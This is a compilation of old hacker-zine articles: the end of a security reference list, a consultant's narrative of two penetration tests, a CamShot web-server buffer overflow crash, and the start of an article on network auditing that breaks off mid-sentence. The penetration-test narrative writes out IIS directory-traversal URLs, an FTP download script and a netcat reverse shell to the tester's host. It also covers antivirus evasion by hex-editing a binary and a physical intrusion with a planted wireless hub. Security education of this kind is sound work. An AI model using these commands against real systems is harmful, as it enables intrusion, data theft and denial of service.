Stuart McClure, Joel Scambray, & George Kurtz have written a book entitled "Hacking Exposed" which uncovers numerous attacker techniques. The reverse telnet technique is detailed in Chapter 13, page 382-3. "Hacking Exposed", ISBN 0-07-212127-0, 1999 http://www.hackingexposed.com/ [11] Michael D. Schiffman wrote a white paper that illustrate a method for using ICMP to establish a covert communications method across a network, including across a firewall. Jeremy Rauch assisted Schiffman in developing proof of concept software, and Schiffman followed it up with a later article that covered implementation issues. Both are available at Phrack's web site at http://www.phrack.com/. "Project Loki: ICMP Tunnelling", Phrack 49, File 6 of 16, 1996. "LOKI2 (the implementation)", Phrack 51, File 6 of 17, 1997. [12] RFC 792, RFC 950, RFC 1122, RFC 1123, and RFC 1812, specifically section 4.3 of RFC 1812 on the handling of ICMP by routers. [13] Solar Designer's Linux kernel patch is available from http://www.openwall.com/linux/. [14] Thomas Wu developed Secure Remote Password (SRP) while attending Stanford. It touts a number of unique features, including defeating zero knowledge attacks and even protects against password recovery from the password file. SRP, http://srp.stanford.edu/srp/ [15] Michael D. Schiffman wrote two articles for Phrack which cover trusted path execution - one for Linux and one for OpenBSD. While the code will not cleanly patch current kernels, it is a good place to start. Visit http://www.phrack.com/. "Hardening the Linux Kernel", Phrack 52, File 6 of 20, 1998. "Hardening OpenBSD for Multiuser Environments", Phrack 54, File 6 of12, 1998. [16] Simple Nomad pulled together several security patches for 2.0.3x kernels and developed a single patch. Two of the included items show how to make use of the built-in state table and kernel-level port scan detection. nmrcOS kernel patches, http://www.nmrc.org/nmrcOS/ [17] Solar Designer's scanlogd daemon detects multiple port connections from a single address. NMap can easily defeat this with slower scans but it is still useful. scanlogd, http://www.openwall.com/scanlogd/ [18] Tripwire can be obtained from Tripwire, Inc. at http://www.tripwiresecurity.com/. The Linux version is free. [19] Commercial IDS products mentioned here can be obtained via the following vendors: NFR IDA from NFR, http://www.nfr.net/ BlackIce from Network Ice Corp., http://www.networkice.com/ Dragon from Network Security Wizards, http://www.securitywizards.com/ You can find this paper and others like it at http://razor.bindview.com/ =================[ Autopsy of a Successful Intrusion ]================== --- by Floydman --- Abstract This paper consists of the recollection and analysis of two network intrusion that I have performed as part of my duties as a computer security consultant. The name of the company I worked, as well as their customers that I hacked into, will remain anonymous for obvious reasons. The goal of this paper is to show real life cases of what computer security looks like in the wild, in corporate environments. I will try to outline the principal reasons why these intrusions were successful, and why this kind of performance could be achieved by almost anybody, putting whole networks at risks that their owner don't even begin to realize yet. Preface It's been over a year now that I delved into computer security. Before that, I was doing computer support and server admin on various platforms: DOS, OS/2, Novell, Windows. I have always been kind of a hack, but I never realized it until I had enough free time ahead of me to start studying the hacking scene and the computer security industry more in depth. That is how I started writing whitepapers, and that I was eventually invited to a conference to present some of my work. But I didn't want to have problems with the law, and I was short on ressources (money, boxes, bandwidth), so I limited myself to keeping tracks of new vulnerabilities and understanding how they worked without actually having the opportunity to try them on a real machine. So when I got this job and they asked me to try to hack these networks, I was really anxious at what I could really do. After all, I can't be worse than a script kiddie, can I? Targeted audience This document is presented to anyone who has interests in computer security, network intrusion, hacking, viruses and Trojan horses, network administration and computing in general. Introduction What I am about to describe here is the complete story of two successful network intrusion, where we (quickly and rather easily) had complete access to everything. These two networks are the same kind of networks that get infected all the time with I Love You, Melissa, Anna.Kournikova, Sircam only to name a few. The people who runs these networks, and the people who own them, can't keep ahead with plain viruses (for another sample of this, read "Virus protection in a Microsoft Windows network, or How to stand a chance"), let alone with a dedicated intruder that will hopefully be smart enough to hide his tracks (but even that his not even to be a requirement soon if it keeps up like that, as we'll see later). And these are networks owned by (apparently) respected big corporations, and were equiped with firewalls and antivirus software. And they still wonder why e-commerce never lifted up to expectations? Technical background of the hack Both networks were based on Microsoft systems, which is not that surprising since it is the most (and by far) used platform in corporate environments, especially on the desktop area. Both intrusions were made over the Internet with tools freely available on the Internet. They used vulnerabilities that were known for quite a long time, and we sometimes had to use a bit of imagination to do the rest. If you are a Windows NT/2000 admin, what you are about to read should scare you to hell. If you are a malicious hacker that does this kind of thing for a living of just plain fun, you probably know all this stuff already. But you'll probably still want to read on to have a good laugh. Both intrusions followed the same methodology, similar to those of a typical intrusion, which is gathering of information, analysis of the information, research of vulnerabilities, and implementation of the attack (we didn't have time to test on one of our machines, but that didn't matter), repeat. Both attacks were done from our facilities using our dedicated ADSL line over the Internet. One of the intrusion involved going undercover physically onsite at the customer premises to plant a wireless hub on the network. A laptop equipped with a wireless network card was also used to link with the hub momentarilly, to avoid detection. Some of the tools used were: SuperScan : to scan classes of IP address to determine open ports CyberKit : this tool lets you do IP infomation gathering (DNS lookups, traceroute, whois, finger) nc.exe : NetCat, ported to Win32. This program lets you initiate telnet connections on any port you want hk.exe : program that exploit a vulnerability in the Win32 API (LPC, Local Procedure Call) that can be used to get System Level access net commands : these should be known to all NT admins (net view, net share, net use, etc) a hex editor : these programs let you edit binary files in hexadecimal/ascii format, a bit similar to notepad for text files l0phtcrack : this software lets you crack the NT passwords file whisker.pl : this script will scan webservers for known vulnerabilities, along with instructions on how to expoit them EditPad Classic : this is a Notepad Deluxe, where we gather the information collected during the hack and other tools that I forgot that were part of the NT Ressource kit or that I will mention later in the text. Sugar input was provided with a supply of M&Ms and coke (the drink, not the sniff). The first victim Pseudonym : XYZ Media Publishing Corporation Type of company : Big Media Corporation (TV, radio, newspapers, magazines, record company, don't they all do that nowadays?) Time allowed to hack : 3 man/days Goal : penetrate the network as far as possible and get evidence of intrusion So I start with the beginning, making DNS lookups on their IP classes, whois requests and port scan the IP addresses of the company's main website as well as the subsidiaries websites. It turns out that there are over 140 machines publicly exposed to the Internet (web servers, DNS, mail, B2B), mostly Windows NT machines, with a couple *nix in the lot. A quick header scan of the web servers show effectively a mix of IIS 3.0 and 4.0. Now, the problem is to figure out where to start. Let's start with the obvious, the main website (NT 4.0 IIS 4.0). A quick check at the Bugtraq archive at SecurityFocus shows me that the "Directory traversal using Unicode vulnerability" is still quite popular (especially by script kiddies who uses it to perform website defacements), even if it's been out for about a year already. Especially since there is a new variation every couple of weeks or so. So I fire up my specially crafted hacking tool, MS Internet Explorer (sarcasm directed at medias covering hacking incidents). The directory traversal vulnerability works by fooling the web server to give you content located outside of the web directory that it is supposed to be limited to. By default (which must cover anything between 50%-90% of the installed base), the content served by the server is located at C:\Inetpub\wwwroot. So, instead of requesting the document http://www.victim.com/index.html (that correspond physically on the server to the file C:\Inetpub\wwwroot\index.html), you request something like http://www.victim.com/../../index.html, which will request the file C:\index.html. Of course, index.html doesn't exist on C:\, but that doesn't matter, since from there you can request any file that you know the location of, based on a default install. Things that come to mind is the cmd.exe program, that you can use to issue commands on the web server as if you were sitting there and typing in a DOS box. I have to say at this point that the vulnerability doesn't work like I said, but that was a simple explanation of http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+dir+c:\+/s Notice that + replaces the [Space] character in your commands, and ?/c+ is required to pass parameters to cmd.exe. %1c%pc is the Unicode equivalent to /.. (other equivalents may work, see the Bugtraq entry about this vulnerability for more details). So now we have in our browser window a complete listing of all files present on the C: drive of the server. We can do the same thing for the D: drive, to see if it's present, and if it is, do it for the E: drive, and so on. The idea is to gather up as much information about the machine as we can get. At this point, we know enough to see what software runs on the machine, where the data is located. Notice that at this point, we could start to issue ping commands or net commands to try to map to any internal network the server may be talking to, but issuing these commands with the web browser is not really convenient. So we're going to get a real command prompt. First, I set up a FTP server (no anonymous access, of course) on my laptop and put my tools in the main FTP folder. Namely, I put nc.exe and hk.exe and a couple from the ressource kit. Then I use the FTP utility conviniently waiting where I expect it to be for me to initate a connection to my laptop and fetch my tools. Since the FTP program is interactive and that I can only issue commands via the web server, I have to make a FTP script on the server. To do this, I simply issue echo commands redirected to a text file, using the directory traversal vulnerability. http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+open+ftp.intruder.com+>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+username>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+password>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+prompt>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+bin>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+mget+*.exe>>ftp.txt http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+echo+bye>>ftp.txt I check out my script with my web browser one last time to make sure there I made no mistake, and then I launch the FTP session, assuming that the firewall permits this kind of traffic. And it does. http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+ftp+-s:ftp.txt Once this is done, I will use netcat to have a command prompt on the webserver. Netcat is a very useful networking tool that you can use to communicate via any port, and spawn a shell prompt. nc -h will give you these options: C:\nc11nt>nc -h [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] So I will launch netcat in listening mode on port 53 (also used by DNS, allowed by the firewall) on my laptop, and launch a netcat connection bound to a command prompt from the webserver to my laptop (using the brwoser once again). In my DOS box nc -l -p 53 and it hangs there... http://www.victim.com/..%1c%pc../winnt/system32/cmd.exe?/c+nc+-d+-e+cmd.exe+my.IP.address.ADSL+53 And the hung DOS box gets: Microsoft(R) Windows NT(TM) (C)Copyright 1985-1996 Microsoft Corp. C:\Intetpub\wwwroot\scripts>_ Voilà, I have a prompt. I use the whoami command from the NT Ressource kit, to find out with disappointment that I am only INET_IUSR/Anonymous, the anonymous Internet user account. So the web server doesn't run on the Administrator account. That means that I still can't reach the NT password file (also called the SAM database) because of the restricted access. No problem, I think, I'll just initiate another telnet connection using another port (23 Telnet, why not?) by using the hk.exe tool. This tool uses a vulnerability involving an undocumented API call (NT_Impersonate_thread or something like that) that lets a thread (a part of a process running in memory) get the token (a security attribute that defines what security level a thread can run, user space or kernel space) of a kernel thread (LSASS or equivalent). To use this tool, you simply type hk followed by any command you would want to run if you had NT AUTHORITY/SYSTEM level privileges (this is above the Administrator account privileges). So I t hk nc -d -e cmd.exe my.IP.address.ADSL 23 Bad command or file name What the?!? I make a dir command, and true enough I don't see any file named hk.exe. Did I forget to download it before? I make another FTP download (using the script again because interactive FTP sessions over a netcat connection doesn't work too well), and sure enough I see the file being downloaded from my laptop. I make a dir command again, and the file still isn't there. So I go to C:\ and make a dir hk.exe /s, and what do you know? It's in the C:\Program Files\Antivyrtec Associates\Antivirus\Quarantine\ folder. Damn, the stupid antivirus caught my file. How can I get root without it? Most antivirus products work by matching byte streams of known viruses and other malware to the programs and files your computer uses. If a match is found, then the file is most probably of dangerous nature, and the antivirus prevents the user from opening it. Ploymorphic viruses uses a flaw in this strategy by modifying themselves every time, making it difficult to identify a reliable byte stream in the virus code that can be used to clearly identify it. Can I also use this flaw to my advantadge? Of course. Actually, that day, I have lost a lot of respect towards antivirus products seeing how easily it was to circumvent it. Using a hex editor (I don't remember which one, but ther all do pretty much the same), I opened hk.exe. What I now see is all the binary code of the executable, shown in an hexadecimal representation. On the right hand side, we see an ASCII representation of each byte of code. Since this is compiled code, it is pretty hard to modify anything in there without screwing up the program and making it useless. Especially since we don't know what bit pattern the antivirus software looks for, and that I know nothing in reverse-engineering. The only thing editable in the program is a small section where we can actually read the message displayed by hk.exe when it successfully executes (something like "Your wish is my command, master"). What the heck, let's change that and see what happens. So I replace the string with XXXX XXXX XX XX XXXXXXXX XXXXXX, and rename the file hk2.exe (which is why I don't remember the exact string, now I only care to use hk2.exe). A quick FTP download later, and I make a dir comman So anyway, I open another DOS box on my machine and I initiate a new listening connection on my laptop nc -l -p 23 and I type the command hk2 nc -d -e cmd.exe my.IP.address.ADSL 23 on the active netcat on the webserver and we get: hk2 nc -d -e cmd.exe my.IP.address.ADSL 23 lsass pid & tid are: 50 - 53 Launching line was: nc -d -e cmd.exe my.IP.address.ADSL 23 XXXX XXXX XX XX XXXXXXXX XXXXXXNtImpersonateClientOfPort suceeded (On the listening DOS box) Microsoft(R) Windows NT(TM) (C)Copyright 1985-1996 Microsoft Corp. C:\Intetpub\wwwroot\scripts> whoami NT AUTHORITY/SYSTEM At this point, I see no reason to keep the first netcat connection, so I kill it. I am now in complete control of the web server and I can do whatever I want on it. I start to upload the SAM database on my laptop and I start cracking it with l0phtcrack, using a dictionnary attack first, then a brute force attack to uncover the few passwords left, if any. While the passwords cracks, I continue my investigations of my newly owned machine. I issue the ipconfig command, and I see the IP addresses of the two network interface cards installed on the machine. The IP address on one of the NIC is effectively the public IP of the web server. The other one bears an internal IP address, and a few pings and net commands later, I have a complete list of the NT Domains, PDC, BDC, Servers. I could talk to the whole internal network! Using some of the usernames/passwords that I cracked, I could go in any domain and from there connect to any workstation. With net accounts, I saw some administrative accounts that I ha As I hopped from one workstation to another, from server to server, I kept making dir c: and dir d: images, downloaded files in various interesting folders (marketing, HR, finance, IT, production, contracts, budget, etc), along with a couple Outlook mailboxes, which tells me that I could probably use the flaws in this software to send a custom virus to take control of a machine, but why bother? I already had access to everything: network maps, list of software approved by IT, standard configuration of a desktop, resumes from applicants, budget of last and current year of various departments, production status reports, finance reports, company acquisition plans and contracts, full employee lists, with phone number, e-mails and salaries, layoff severance documents, full calendar appointments of some management people, along with their mailboxes, which also showed up some interesting things. I will always remember this e-mail I read that the guy I hacked into received from one of his friends. In the e-mail, We were about to run out of time, since my three days were almost run out. Let's not forget that I had to write a report after that, and that the customer only paid for such amount of time. But there was still a little piece of the network that I couldn't get access to. It was refusing any connection attempt from any domain that I already had control of. That was a separate NT domain, on its own IP class C network, with very restricted access, probably accessed only by the board of directors if I rely on the domain name. No password that proved useful before would work. A port scan showed me that there was a web server on this network, and I knew it was a NT server, and most probably running IIS 4 as well. But how can I launch a web request from a DOS prompt in order to hack the server like I did the first one? I could probably make a tool someday, but I definetely don't have this kind of time on my hands right now. I see the gold, I want the gold (even though I have plenty already), and I am willin Winvnc works a bit like nc, but instead of giving a simple command prompt, it give full access to the graphical user interface (GUI) as if you were sitting in front of the machine, the same way as PCAnywhere does. This have the side effect that a person sitting in front of the machine will see all your actions, which means that you have been spotted. In my case, I had nothing to lose, so the plan is to download Winvmc on the machine I currently own, initiate the GUI connection from there, and then use the browser installed on the web server to launch a similar attack to the intranet server using the directory traversal vulnerability. From there, I hope to be able to find some usernames and passwords that I can use to gain access to the protected machines in the same fashion as to what I had done so far. So I initiate the Winvnc session, and surprise, I see right in the middle of the screen two pop-up warnings from the antivirus software, generated from the two unsuccessful downloads of hk.exe, 2 days ago. So I click OK to remove any visual evidence of my presence, and I proceed to clean my presence a bit, deleting all the stuff that I won't need anymore. I also notice some of the NT Res kit that I used in another folder that was not mine. That made me wonder if it was the admin who conveniently installed it there for anyone to use, of if it was the I was about to launch IE in order to finish my attack quickly and return to the stealthier DOS command prompt that a second surprise happens: Notepad opens up with a message saying "who r u?". I knew I could be spotted, and I have been spotted. The spelling of the message makes me wonder if I am dealing with a IT professional or a script kiddie here, but a quick look at the processes running on the machine (ps.exe from the NT Res Kit) shows me that he is connected via a PCAnywhere session, so it's probably a tech support, but he's not in front of the machine. So I write "God" in the notepad message, give him about 5 seconds to read my reply, and then I kill his connection (kill.exe). Then I quickly erased the rest of my files on the machine, and killed my session while I was laughing hard with a colleague beside me. Too bad that I missed that last vault, and that I have been spotted, but if I wasn't only a guy doing his job, working 9-5 because I also have a life, and under an artificial schedule, I would have cracked it, undetected. A dedicated corporate spy or malicious hacker would have done this at night, and would have been completely undetected for as long as he wants. The second victim Pseudonym : Trust-us e-commerce inc. Type of company : e-commerce company, implements B2B and B2C solutions for businesses Time allowed to hack : 3 man/days Goal : penetrate the network as far as possible and get evidence of intrusion So my first impression of a big corporate network (from my previous work experience at a telecommunications company, see Virus protection in a Microsoft Windows network, or How to stand a chance) from the security point of view proved to be true with my successful and easy network intrusion I had done for XYZ Media Publishing Corporation. I was anxious to see how I would fare against an e-commerce company. I was curious to see if they really cared about security, given their area of expertise. So the hack started pretty much the same way as the first one: DNS lookups, whois, portscan, etc. It turns out that there's about 5 or 6 machines reachable via the Internet. 2 *nix DNS servers, 1 Exchange mail server, and a couple IIS machines. These machines are all firewalled and only allow very specific traffic : http, https, DNS, SMTP. But remember that if one of these services is vulnerable, it can be exploited and the firewall won't be effective at blocking the attack. I issue a whisker scan on the webservers to see if there's any known vulnerabilities on the web server itself, and in the cgi programs as well. The machines turns out to be pretty secure, even if they are NT boxes. The server appears to be patched up to date, and non-necessary services have been removed from IIS (such as idq requests, asp pages, default sample pages). So I can't use the directory traversal vulnerability on this one. I try to screw up with some invalid requests in the cgi programs, trying to see if I can provoke We had received some new toys a couple of weeks before, and we couldn't wait to try them in the field. We had a wireless hub and a pair of PCMCIA wireless network cards. I don't know how much this equipment costs, but it shouldn't run above 2-3 k$, probably less. Not exactly cheap, but not unnafordable to individuals. So we decided to attempt a physical intrusion in their offices and plant the wireless hub on their internal network and see what happens next. We were three persons to do this operation, but it could have been achieved by only a single person. We thought a bit about doing a masquerade and pretend that we were from the phone company or something, all along with the uniforms and even a line tester that makes bip-bip sounds that are sure to convince any non-technical person unfamiliar to this kind of equipment. We even had the floor plan, that my boss asked to the facilities management guy (those who manage building services). He gave the plans to my boss without asking any ID or whatever, my boss simply told him that he was working for Trut-us e-commerce inc, and that was it! My boss was even left alone in the facilities guy office for about half an hour, even time to give him the opportunity to take a peek or two, or steal one of the uniforms hanging by the door if he wanted to. But instead, we chose a simpler course; simply walk in dressed casual (average employee age at Trus-ut is about 25-30) and pretend to belong there. The company is quite new, and they are hiring new staff, so it's quite normal for a place like this to see new faces. So the plan was to have one person walk in the offices, avoiding the main entrance of the offices if possible, to avoid the receptionist desk, and put the wireless hub on the network, in a free LAN jack in the photocopier room (as we could see from the floor plan). And to collect any valuable data the onsite visit can provide. In the meantime, another colleague would be sitting in a toilet stall with his laptop equipped with the wireless network card and try to get access to the network. If he proved successful, he would iniate a netcat connection from one of their machines to my laptop, and then leave the premises. As for me, I will be at our offices, hooked up on the ADSL link, and waiting for the netcat connection to come to me. Once I g And that's exactly what happened! My first colleague got in from the door beside the staircases, going inside with other people that were coming back from a cigarette break. He went to the photocopier room, and plugged the wireless hub to the network, and hid it behind some boxes. After that, he walked across in the offices, a lot of cubicles being empty, as the company had plans for growth. He said "Hi!" to a couple of persons who were having a conversation. He found an employee list on a desk, with all the phone numbers and positions in the company. He went back to the photocopier room, and made a copy. He also looked for other stuff, but it was hard to figure out what paper documents are about without looking suspicious. So after half an hour, he simply took the hub back with him and left the premises. Meanwhile, colleague #2 is in the bathroom stall with his laptop. He waits about 5 minutes to give #1 enough time to plant the bug. Then he boots up his machine and he automatically gets an IP address from the internal network DHCP server. That's a good start! It takes him no time to take control of an internal web server to launch the netcat connection to me (with full SYSTEM/NT_AUTHORITY privileges, of course). While I put my scheduled jobs on this machine to keep a point of entry, he goes on an exploration tour of the rest of the network, stops in a couple workstations to download some files, and leaves after 15 minutes, after making sure with me that everything was under control on my side (using a text file to send messages to each other). As for me, I started doing the usual stuff, downloading the server's SAM file, cracking it, exploring the contents of some workstations, visiting the servers and the PDC/BDC getting these SAMs also. I downloaded some of their website source code, looked a test systems, and the customer database, etc. I could see that there were firewalls between some of the internal network segments, but all netbios ports were allowed, since these machines were all part of the same NT domain. I accidentally killed my session, but it came back to me exactly when I expected it, so I could continue without any problem. At the end of the day, our mission was done. Again, we were three persons to implement this attack, but this could be done by a single person. We only had one day left to perform the intrusion, so we had to be efficient and well prepared. But a single well prepared person, having no other schedule than his own, could have easily walked in the offices, plant the hub on the network, go in the bathroom, schedule hk2 netcat sessions at specific times, and go home and simply wait for the connections to initiate. Then he is free to do all he wants. The autopsy of the two hacks My goal with this paper is not to give a hacking cookbook to script kiddies so they can screw up big corporations real big instead of just defacing their websites. Neither is it to promote network intrusions. My goal is to give a reality check to the IT industry, and to the companies that employ them, about the situation regarding network security. To show how easy it is, and the impact on a business a security incident like this could cause. Having all the information that is available, a malicious person have limitations restricted only to his imagination (BTW, blackmailing is very unimaginative). My goal with this paper is also to outline why these hacks were so easily successful, in order to understand why this could happen in the first place. Only then will we be able to define corrective actions. So it is in this chapter that we will make the autopsy of these hacks, and find out what problems these companies, and many others, are facing. In the case of XYZ Media Publishing Corporation, the problems are numerous, and do not simply involve technology. First of all, I made a lot of mistakes when I hacked this machine (the webserver), learning curve and all... For example, I did not erase the evidence of my intrusion in the IIS log files. A kiddie would probably have tought to erase to whole file, but an experienced intruder would have only deleted the entries belonging to him, to leave has little trace as possible. Not that it mattered in this case, because nobody looked at the log files. They only checked when they received my report, and they were astonished at how much noise I made that went undetected. Worse that that, there was 2 visual antivirus pop-ups (hk.exe) on the server's screen showing for 2 days without anybody noticing it, or actually they saw it, but didn't bother to care about it! But wait, there's more: the tech that spotted us while we were in a Winvnc session didn't even bother to report the incident to anybody! With Another problem is the lack of experience of their IT staff. It is well known that these big corporations, in order to be cost-efficient (i.e. as cheap as possible, to keep shareholders happy), centralize their support to reduce costs, and doing so will hire those who costs less, who happens to be the less experienced on the market. I took a good look at the resumes of their staff, and it tends to confirm my theory. Most of them didn't even have a college degree, even less a university degree. They had a computer support course and a MCSE from a specialized school, in a word, they were green. These people knows only as far as what they have been shown, and will click were they learned to click, without any understanding of the concepts or implications of what they have just done. This is a direct effect of the big boom in the IT industry during the 90's. The demand was too high compared to the offer, so the industry had to generate more workforce, and doing so rushed out of schools diplomed computer i This leads to the third problem, directly generated by the precedent one, which is the presence of unpatched, highly vulnerable servers on the Internet. And their problem is about 40-fold, since XYZ Media Publishing Corporation is really about 40 smaller companies, all owned by XYZ Media Publishing Corporation, and each of these companies have the same problem, and all requires urgent security measures. $$$ The fourth problem, in the same vein, is a really bad network architecture. XYZ Media Publishing Corporation cared enough about its network to at least put firewalls at each internet entry points. All serious firewall products include the possibility to have a DMZ, which is a separated part of your network, designed to receive the public access machines like a web server or a mail server. The idea is to keep these machines separated from the rest of your internal network. Since these servers are exposed to the Internet, than means that anyone can potentially compromise the server. The role of the firewall is to deny all access from the DMZ machines to the internal network, because these machines cannot be trusted and a connection initiated from one of these machines means that the machine as most probably been cracked. That way, you protect your internal network from Internet exposure, have your pulic servers, and make sure that the servers can't be used to access the internal network. In the case of The fifth problem afflicted both companies, and is spread everywhere in the networked corporate world, and it's the fact that the internal network, and especially the workstations, are completely unprotected. Many of the PCs have open shares, not even protected by a password (which could be broken anyway, especially on a Win 9x machine). Passwords are weak and easily broken. ACLs are rarely implemented on NT workstations, are implemented in the data portion of the servers (to prevent people to access other people's files), but not on the system portion, which means that anyone can grab the passwork file and crack it later. Antivirus are often out of date, even if auto-update features are now a common thing, and even if they were up to date, they can be easily circumvented. Let's just say that if your only protection is an antivirus product, then you shouldn't even bother to install it. The sixth problem is the one that caught Trust-us e-commerce inc. pants down. Being an e-commerce company, they were serious enough about it to take good care of their systems. The ones exposed to Internet, that is. So besides having their internal systems completely open like XYZ Media Publishing Corporation, their physical security was inexistant. Beginning with the guy who manages the building who gives us the floor plans! He even offered to give us the plan of other floors. Then, it was easy to go inside the offices without being challenged by anyone, forcing the intruder to think quick and bullshit his way out, with the chance that he makes a mistake and give himself away. The floor had many access doors besides the main entrance, guarded by the secretary. There's no badge or ID or anything to differentiate an employee from an outsider. That was their weak spot. Ironically, I would say that XYZ Media Publishing Corporation was more protected in terms of physical security, but it could still be Then, there is the little security awareness from corporations high management. The finance director of XYZ Media Publishing Corporation was all shocked to see the results of my intrusion attempt, as he firmly believed that their network secure. Then, in true beancounter style, he complained about the amount of money they paid for the firewalls, that proved to be useless after all. But this guys only understands dollars, not technology. Is it possible to achieve a secure computing environment connected to the Internet without firewalls? Absolutely no, of course! But are they sufficient in order to securise the computing environment only by themselves? The answer is no again. But he thought that by simply buying an expensive band-aid, that would solve all their security problems. Which leads me to the last problem I can identify in this autopsy. Pretty much like the IT industry growth of the 90's and the Y2K rush that later mutated in e-commerce, the computer security industry is also being the victim of a "gold rush effect". Since the enormous size of the vulnerable computing base in corporate IT, it is not hard to see a high revenue potential for any skilled business man. It is not rare then to see small professional security firms being purchased and merged with bigger IT companies, that were mostly in the MCSE business before that (what a surprise). Instead of seeing the knowledge of the security firm being applied the the MCSE shop's procedures, in order to increase the value of the services they provide, and thus doing better than the competition (which should get you to increase your market share and revenues), they want to keep the security department from bashing too much on Microsoft, because they are a business partner, and it isn't a good thing to bitch against a partner, because it might piss him off. Also, the MCSEs didn't appear t Conclusion The cases I have covered here are real life cases, nothing have been added for dramatic effects. I know that it is not all networks that are this vulnerable, but let's be serious, secured networks are the exception, not the norm. The norm, it is what is explained in this paper. This is even worse than a worm that walks across webserver to webserver (although Code Red II made it interesting by backdooring the servers it infected in order to make it even easier than what is shown in this paper to hack the machines) or an e-mail virus that send files out. These problems are also serious enough to take care of, but it's only the tip of the iceberg. Now, with all the desinformation going on, attempt by companies to shut down free speech concerning computer security research and related topics, up to the point of arresting a russian programmer this summer for writing a "circumvention decice", and all the other abuses of the DMCA, I wonder what will happen to me and this paper. Will I be arrested for showing out how to "circumvent a security mecanism" by fooling the antivirus? This may seems like a dumb and ridiculous joke pointed out to the spooks out there, but to tell you frankly, I see hackers as being the target of the new witch hunt of the 2000's. It is sad, because they are the very same people who built this wonderful network that is Internet, and they are the people who can most contribute to its securing, by doing research and sharing information. But the thing is, and it should be obvious by now to the reader, that the systems out there are massively and highly unsecure, and stopping people talking about these issues, and keeping the public in ignorance by putting fear into them fueled by mass-medias hysteria is not gonna help. In order to solve these issues, priorities will have to be made, and those who choose the right priorities are probably those who are gonna win in the long run. In the meantime, anything can happen. Appendix A. Ressources BUGTRAQ www.securityfocus.com Big security site and host of the Bugtraq mailing list Britney's NT hack guide http://www.interphaze.org/bits/britneysnthackguide.html Guide to hacking NT and IIS Rain Forrest Puppy http://www.wiretrip.net/rfp/2/index.asp Home page of Rain Forrest Puppy, discoverer of the Unicode directory traversal vulnerability, and author of Whisker Astalavista http://astalavista.box.sk/ Search engine for security related websites, tools and articles Google www.google.com Web search engine, useful to look for hard-to-find stuff like hk.exe ===[ Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP ]=== --- by Lucid --- Intro So im sure you might have seen this little trick.. but if you havent, its a rather funny way to screw with a server running CamShot WebCam HTTP Server v2.5. As always, this is for you information only, hacking is bad, it make mes cry... im starting to cry thinking about it now.. see what you've done??! Affects As far as I know, for sure it affects Win9x, I am yet to find an NT, ME, or 2000 box running it. The Code [lucid@localhost]$ telnet www.test.com 80 Trying test.com... Connected to www.test.com Escape character is '^]'. GET (buffer) HTTP/1.1 (enter) (enter) Why (buffer) is about 2000 charicters, requesting this cuases the server to over flow itself, and in time, crashing the software, ( once or twice on my test machine it killed the system as well ). What They See CAMSHOT caused an invalid page fault in module at 0000:61616161. Registers: EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246 EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058 ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000 Bytes at CS:EIP: Stack dump: bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74 005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8 Closing Yes its a lame little exploit bu its fnny none the less. Again only use this on yourself would wanna make me cry again. http://www.Phreak2000.com ============[ An Approach to Systematic Network Auditing ]============== --- by Mixer --- In the past few years, people have learned that a well concepted network installation done by administrators with average knowledge of security could still very often be compromised due to the large amount of possibilities to attack and discovered vulnerabilities an intruder nowadays has at his disposal. This is the cause why recently security auditing and penetration testing has become popular for big companies, security-aware individuals and of course the security industry. Network auditing, or penetration tests can be seen as a systematic attempt to gain access to a network by discovering all points of access to it, and then analyzing those points for any known vulnerabilities, which a real intruder could use to gain further access. However, many companies are performing this kind of analysis in a manner, which is really not sufficient and systematic enough to spot all possible vulnerabilities. So, here is one possible approach, in a nutshell, that I would take to secure a network systematically. Starting off with a secure network The main pre-requirement for having a secure network is to start off with installations of which you can be sure that no security intrusion has previously happened. Imagine a big company severely securing their resources, only to find they have been compromised a year before, and the attacker has changed the system kernel so he doesn't require any vulnerable program at all to gain access anymore. There hasn't even to be a permanently open tcp or udp port; if the intruder is clever, he had reprogrammed the system to watch for raw data containing secret activation code, and then give backdoor access for a very short period of time, that cannot be detected unless one knows the correct code. Take a look at the Q [1] remote shell, if you need an example. So, first of all, (re-) install your operating systems, making sure that there is are no binary executables left from old installations. Importing other kind of data from other systems generally creates no security risk. If you are open-minded enough to take an advice on what OS to use, then let me suggest anything except Windows NT. Systems like HPUX/AIX/IRIX are no good, either, because they are not open source. The problem is that you CANNOT trust systems that come without their source code to be secure at all. The vulnerabilities which exist in the software and kernel of commercial non- open-source systems are not worse than those in other systems, but they EXIST, and it is very hard for the security community to identify them, and it takes alot more time. For an example, SunOS / Solaris was always said to be very secure, until recently its creators decided to make the source code public (which was a good idea in long-time measures). Quickly, a huge lot of vulnerabilities that couldn't be detected before were found in Solaris, and some people still consider it to be extraordinary secure... this was the right step on becoming a secure operating system, but it will surely take a long time until virtually all vulnerabilities have been spotted. If you want a secure operating system, install a BSD derivate, such as OpenBSD. You can also use 